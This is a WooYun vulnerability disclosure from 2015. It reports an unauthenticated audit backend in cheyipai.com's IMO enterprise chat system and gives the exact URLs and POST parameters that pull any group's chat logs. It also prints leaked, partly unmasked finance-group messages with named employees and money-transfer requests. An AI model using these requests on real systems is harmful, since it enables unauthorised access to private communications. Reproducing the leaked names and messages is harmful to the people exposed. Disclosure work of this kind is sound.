当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166231

漏洞标题:车易拍某系统漏洞导致内部敏感信息泄露

相关厂商:cheyipai.com

漏洞作者: 路人甲

提交时间:2015-12-31 09:55

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-31: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

RT

详细说明:

车易拍使用的imo企业即时通讯软件,其审计后台存在一处未授权访问漏洞,可导致企业内部的聊天记录泄漏。
算是通用的吧,懒的弄了
获取某一群组在某一时间段的聊天记录:
http://imo.cheyipai.com/Customize/Audit/MessageMonitor/groupSearch.php?id=35651&startTime=2015-12-01 00:00:00&endTime=2015-12-15 23:55:58&keyWord=
POST数据:
page=1&rows=50
结果如下:

1.png


unicode解码后:

2.png


其中id是群id,是怎么得来的呢?下面的连接可以返回所有群名称及id:
http://imo.cheyipai.com/Customize/Audit/auditreport/Qgrouplist.php
部分截图如下:

3.png


解码后:

4.png


如此便可获取任意群组的通信记录,另外个人通信也是可以获取。
如此便可导致整个企业内部使用了该软件的通信记录全部泄漏。

漏洞证明:

运维组昨天和今天的一些对话(从下往上看...):



mask 区域


*****;Fuid":"2314310","Fqgroup_id":"1500997","Fmsg":[{&*****
*****;3322","Fqgroup_id":"1500997","Fmsg"*****
*****qgroup_id":"1500997","Fmsg":[{"txt"*****
*****uot;Fqgroup_id":"1500997","Fmsg":[{&quo*****
*****;Fqgroup_id":"1500997","Fmsg":[{"txt&qu*****
*****uot;Fqgroup_id":"1500997","Fmsg":[{&quo*****
*****qgroup_id":"1500997","Fmsg":[{"txt"*****
*****oup_id":"1500997","Fmsg":[{"txt":*****
*****;Fqgroup_id":"1500997","Fmsg":[{"txt&qu*****
*****"1500997","Fmsg":[{"img":{"h":"27*****
*****ec104f5d55a99d47deb2e5ebb71","w&quo*****
*****_id":"1500997","Fmsg":[{"txt":{&q*****
*****ot;Fqgroup_id":"1500997","Fmsg":[{"txt*****
*****d":"1500997","Fmsg":[{"txt":{&quot*****
*****;Fqgroup_id":"1500997","Fmsg":[{"t*****
*****ot;,"Fmsg":[{"img":{"h":"101","id&qu*****
*****477573019984b","w":"*****
*****qgroup_id":"1500997","Fmsg":[{"txt"*****
*****d":"1500997","Fmsg":[{"txt":{"v&qu*****
*****;Fqgroup_id":"1500997","Fmsg":[{"t*****
*****997","Fmsg":[{"txt":{"v":"Ok,问题^*****
*****uot;Ftime"*****
*****_id":"1500997","Fmsg":[{"txt":{&q*****
*****quot;Fqgroup_id":"1500997","Fmsg":[{&*****
*****2 其它不变。解决天津不能访问^*****
*****quot;Fqgroup_id":"1500997","Fmsg":[{"*****
*****uot;1500997","Fmsg":[{"img":{"h":"73&qu*****
*****8573c6631aaadf503517a9","w":&*****
*****t;,"Fqgroup_id":"1500997","Fmsg":[{*****
*****qgroup_id":"1500997","Fmsg":[{"txt"*****
*****t;,"Fmsg":[{"img":{"h":"0","t":&quo*****
*****quot;Fqgroup_id":"1500997","Fmsg":[{"*****
*****;Fqgroup_id":"1500997","Fmsg":[{"txt&qu*****
*****ot;Fqgroup_id":"1500997","Fmsg":[{"txt*****
*****uot;Fqgroup_id":"1500997","Fmsg":[{&quo*****
*****quot;:"1500997","Fmsg":[{"txt":{"v"*****
*****ot;2314310","Fqgroup_id":"1500997","Fmsg&*****
*****quot;1500997","Fmsg":[{"txt":{"v":"*****
*****uot;201*****
*****d":"1500997","Fmsg":[{"txt":{"v&qu*****
*****:"1500997","Fmsg":[{"txt":{"v":&qu*****
*****uot;}}]},{"Ftime*****
*****up_id":"1500997","Fmsg":[{"txt":{&quo*****
*****t;,"Fqgroup_id":"1500997","Fmsg":[{*****
*****id":"1500997","Fmsg":[{"lnk":{"v*****
*****quot;Fqgroup_id":"1500997","Fmsg":[{"*****
*****Fqgroup_id":"1500997","Fmsg":[{"txt&*****
*****roup_id":"1500997","Fmsg":[{"txt":{&*****
*****quot;Fqgroup_id":"1500997","Fmsg":[{"*****
*****up_id":"1500997","Fmsg":[{"txt":{&quo*****
*****oup_id":"1500997","Fmsg":[{"txt":*****
*****up_id":"1500997","Fmsg":[{"txt":{&quo*****
*****p_id":"1500997","Fmsg":[{"txt":{&q*****
*****;Fqgroup_id":"1500997","Fmsg":[{"t*****
*****up_id":"1500997","Fmsg":[{"txt":{&quo*****
*****"1500997","Fmsg":[{"img":{"h":"21*****
*****0ba107ab8cb6f30af79ba1d4855","w&quo*****
*****4310","Fqgroup_id":"1500997","F*****
*****rows":[{"Ft*****
*****uot;1500997","Fmsg":[{"img":{"h":"62&qu*****
*****47315f8865d9fe69b45be9","w":&*****
*****;,"Fqgroup_id":"1500997","Fmsg":[{&quo*****
*****group_id":"1500997","Fmsg":[{"txt":{&q*****
*****d":"1500997","Fmsg":[{"txt":{"v&qu*****
*****"1500997","Fmsg":[{"img":{"h":"27*****
*****cf66007a2258445a2e298420f25","w&quo*****
*****qgroup_id":"1500997","Fmsg":[{"txt&*****
*****t;Fqgroup_id":"1500997","Fmsg":[{"txt*****
*****"1500997","Fmsg":[{"img":{"h":"92*****
*****9fd2335a1eea6c8d5b7dcd4c6a","w&quot*****
*****ot;,"Fmsg":[{"img":{"h":"0","t":&quo*****
*****ot;,"Fmsg":[{"img":{"h":"0","t":&quo*****
*****group_id":"1500997","Fmsg":[{"txt"*****
*****t;,"Fmsg":[{"img":{"h":"0","t":&quo*****
*****_id":"1500997","Fmsg":[{"txt":{&quo*****
*****uot;Fqgroup_id":"1500997","Fmsg":[{&quo*****
*****msg":[{"txt":{"v":"票都没买着呢!"}},{"img&*****
*****e":&quo*****
*****quot;:"1500997","Fmsg":[{"txt":{"v"*****
*****;:"2*****
*****":"1500997","Fmsg":[{"txt":{"v&*****
*****qgroup_id":"1500997","Fmsg":[{"txt"*****
*****uot;1500997","Fmsg":[{"img":{"h":"86&qu*****
*****4b7fc50146f3288cb129c4","w":&*****
*****;Fqgroup_id":"1500997","Fmsg":[{"t*****
*****uot;1500997","Fmsg":[{"img":{"h":"71&qu*****
*****70d13c489e4a5c0d748e84","w":&*****
*****uot;1500997","Fmsg":[{"img":{"h":"93&qu*****
*****7c45d2ec9800a7984874a6","w":&*****
*****;Fqgroup_id":"1500997","Fmsg":[{"txt&qu*****
*****ot;Ftime"*****
*****ot;Fqgroup_id":"1500997","Fmsg":[{"txt*****
*****roup_id":"1500997","Fmsg":[{"txt":{&*****
*****up_id":"1500997","Fmsg":[{"txt":{&quo*****
*****quot;Ftime"*****
*****;:"1500997","Fmsg":[{"txt":{"v":&quot*****
*****ot;Fqgroup_id":"1500997","Fmsg":[{"txt&q*****
*****,"Fqgroup_id":"1500997","Fmsg":[{&qu*****
*****d":"1500997","Fmsg":[{"txt":{"v&qu*****
*****up_id":"1500997","Fmsg":[{"txt":{&quo*****
*****"1500997","Fmsg":[{"img":{"h":"16*****
*****ce77af890001298b75cbb86094","w&quot*****
*****"1500997","Fmsg":[{"img":{"h":"16*****
*****3bb3fca412bb9ea64ff6b63133","w&quot*****
*****;Fqgroup_id":"1500997","Fmsg":[{"txt&qu*****
*****roup_id":"1500997","Fmsg":[{"txt":{&*****
*****roup_id":"1500997","Fmsg":[{"txt":{&*****
*****,"Fqgroup_id":"1500997","Fmsg":[{&qu*****
*****;Fqgroup_id":"1500997","Fmsg":[{"txt&qu*****
*****;Fqgroup_id":"1500997","Fmsg":[{"txt&qu*****
*****;:"1500997","Fmsg":[{"txt":{"v":&quot*****
*****t;,"Fqgroup_id":"1500997","Fmsg":[{&quo*****
*****t;,"Fmsg":[{"img":{"h":"0","t":&quo*****
*****up_id":"1500997","Fmsg":[{"txt":{&quo*****
*****roup_id":"1500997","Fmsg":[{"txt":{&*****
*****up_id":"1500997","Fmsg":[{"txt":{&quo*****
*****qgroup_id":"1500997","Fmsg":[{"txt"*****
*****0997","Fmsg":[{"txt":{"v":"浏览器不*****
*****,"Fmsg":[{"img":{"h":"0","t":&quot*****
*****;:"1500997","Fmsg":[{"txt":{"v":*****
*****id":"1500997","Fmsg":[{"txt":{&quot*****


资金管理组:

{"total":"23","rows":[{"Ftime":"2015-11-30 
11:18:06","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转100万,用于支付日产项目回款,谢谢"}}]},{"Ftime":"2015
-11-13 
15:58:08","Fname":"金萌","Fcid":"110197","Fuid":"1525","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转款100w,用于付五道口项目"}}]},{"Ftime":"2015-11-10 
09:40:37","Fname":"冯莹","Fcid":"110197","Fuid":"4208791","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给新发地光大转20万,用于线下付款"}}]},{"Ftime":"2015-11-06 
15:49:36","Fname":"王海燕","Fcid":"110197","Fuid":"2041","Fqgroup_id":"1041695","Fmsg":[{"img":{"h":"0","t":"sys","v":"118.gif","w":"0"}}]},{"Ftime":"2015-11-06 
15:49:22","Fname":"金萌","Fcid":"110197","Fuid":"1525","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转款100w,用于五道口项目"}}]},{"Ftime":"2015-11-04 
14:44:46","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转100万,用于支付日产项目回款,谢谢"}}]},{"Ftime":"2015
-10-30 13:39:31","Fname":"杨丹","Fcid":"110197","Fuid":"1264","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给新发地光大50w 
用于线下付款,谢谢"}}]},{"Ftime":"2015-10-30 
13:35:40","Fname":"王海燕","Fcid":"110197","Fuid":"2041","Fqgroup_id":"1041695","Fmsg":[{"img":{"h":"0","t":"sys","v":"118.gif","w":"0"}}]},{"Ftime":"2015-10-30 
13:34:55","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转100万,用于支付日产项目回款,谢谢"}}]},{"Ftime":"2015
-10-29 14:42:41","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"谢谢"}}]},{"Ftime":"2015-10-29 
14:42:38","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转100万,用于支付日产项目回款"}}]},{"Ftime":"2015-10-24
 11:24:23","Fname":"卢思远","Fcid":"110197","Fuid":"4610092","Fqgroup_id":"1041695","Fmsg":[{"img":{"h":"0","t":"sys","v":"118.gif","w":"0"}}]},{"Ftime":"2015-10-24 
 11:15:30","Fname":"杨丹","Fcid":"110197","Fuid":"1264","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"谢谢"}}]},{"Ftime":"2015-10-24 
 11:15:28","Fname":"杨丹","Fcid":"110197","Fuid":"1264","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给新发地光大10w 用于线下付款,线下"}}]},{"Ftime":"2015-10-20 
 13:31:15","Fname":"王海燕","Fcid":"110197","Fuid":"2041","Fqgroup_id":"1041695","Fmsg":[{"img":{"h":"0","t":"sys","v":"118.gif","w":"0"}}]},{"Ftime":"2015-10-20 
 13:30:40","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转150万,用于日产项目回款,谢谢"}}]},{"Ftime":"2015-10
 -19 
 16:13:24","Fname":"冯莹","Fcid":"110197","Fuid":"4208791","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给新发地光大转款20万,用于线下付款。着急。马上4点半了。谢谢"}}]
 },{"Ftime":"2015-10-16 
 11:39:10","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转200万,用于支付日产项目回款,谢谢!"}}]},{"Ftime":"2
 015-10-14 
 14:42:56","Fname":"王海燕","Fcid":"110197","Fuid":"2041","Fqgroup_id":"1041695","Fmsg":[{"img":{"h":"0","t":"sys","v":"118.gif","w":"0"}}]},{"Ftime":"2015-10-14 
 14:42:42","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转100万,用于日产项目回款,谢谢"}}]},{"Ftime":"2015-10
 -10 13:19:06","Fname":"王海燕","Fcid":"110197","Fuid":"2041","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"好的"}}]},{"Ftime":"2015-10-10 
 13:18:31","Fname":"孙路梅","Fcid":"110197","Fuid":"1042","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转200万,用于日产项目回款,谢谢"}}]},{"Ftime":"2015-10
 -08 15:40:46","Fname":"金萌","Fcid":"110197","Fuid":"1525","Fqgroup_id":"1041695","Fmsg":[{"txt":{"v":"请给亚市光大转款100w"}}]}]}


如果觉得有该部分信息敏感,厂商可以联系wooyun漏洞审核人员或者我来修改屏蔽,在漏洞确认后删除该部分信息。

修复方案:

审计后台放在内网吧。
联系厂商把。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-12-31 12:39

厂商回复:

感谢提交

最新状态:

暂无